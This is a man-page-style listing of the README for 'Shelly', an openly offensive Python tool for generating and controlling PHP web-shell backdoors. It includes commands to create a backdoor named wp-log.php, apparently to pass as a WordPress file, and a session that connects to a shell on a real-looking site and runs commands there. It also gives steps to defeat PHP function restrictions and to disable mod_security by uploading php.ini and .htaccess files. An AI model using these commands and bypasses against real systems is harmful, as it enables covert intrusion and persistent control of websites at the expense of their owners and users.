SHELLY(1)

NAME

ShellySimple Backdoor Manager with Python (based on weevely)

SYNOPSIS

$pip install -r

INFO

96 stars
34 forks
0 views

DESCRIPTION

Simple Backdoor Manager with Python (based on weevely)

README

Shelly | Simple Backdoor Manager with Python (based on weevely)

Screenshoot
Shelly is a simple tool that is written using Python, which functions to remote a website

Instalation :

$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
$ python3 shell.py

Requirements :

sudo pip install -r requirements.txt

Example :

python3 shell.py -g wp-log -p tegal1337


/ / / ___ / / __ __ \ / _ / -/ / / // / ////_///_, / /___/ v.1

Python shell - Tegal1337 | Generate : [+] ./backdoor.py -g "nama_shell" -p "password" Connect Server : [+] ./backdoor.py -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama wp-log.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337 /opt/lampp/htdocs/php-futsal$ id uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)

Screenshoot Screenshoot

Disable Function Bypass :

  • look for the folder whose permissions 777 (rwx rwx rwx)
  • Upload file php.ini
safe_mode = OFF
disable_functions = NONE
  • And upload file .htaccess

SecFilterEngine Off
SecFilterScanPOST Off

Artikel :

  • https://blog.tegalsec.org/meremote-sebuah-website-menggunakan-backdoor-python/

Contact :

  • Email : van@tegalsec.org

Support our organization by giving donations

Foo

SEE ALSO

clihub3/4/2026SHELLY(1)